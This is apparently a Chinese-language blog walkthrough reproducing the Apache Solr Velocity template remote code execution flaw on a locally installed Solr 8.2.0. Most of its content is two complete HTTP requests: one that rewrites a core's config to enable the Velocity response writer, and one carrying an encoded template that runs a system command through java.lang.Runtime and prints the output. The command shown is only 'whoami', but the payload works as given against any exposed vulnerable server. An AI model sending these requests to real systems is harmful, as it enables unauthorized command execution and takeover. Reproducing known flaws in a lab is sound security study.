- 下載漏洞環境https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip
- 解壓以後,進入
solr-8.1.0/bin
目錄
使用./solr -e dih -force
開啓漏洞環境 - 訪問
http://youip:8983/solr/#/
進入主界面 - 點擊左側的
Core Selector
查看集合名稱,可以看到每個項目下都有config文件,下面以db演示。 - 使用如下payload
修改集合設置POST /solr/db/config HTTP/1.1 Host: youip:8983 Pragma: no-cache Cache-Control: no-cache Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 Accept-Encoding: gzip, deflate Content-Type: application/json Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6 Connection: close Content-Length: 263 { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }
-
命令執行
GET /solr/db/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 Host: youip:8983 Pragma: no-cache Cache-Control: no-cache Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 Accept-Encoding: gzip, deflate Content-Type: application/json Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6 Connection: close Content-Length: 0
Apache Solr Velocity模板遠程代碼執行漏洞復現
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.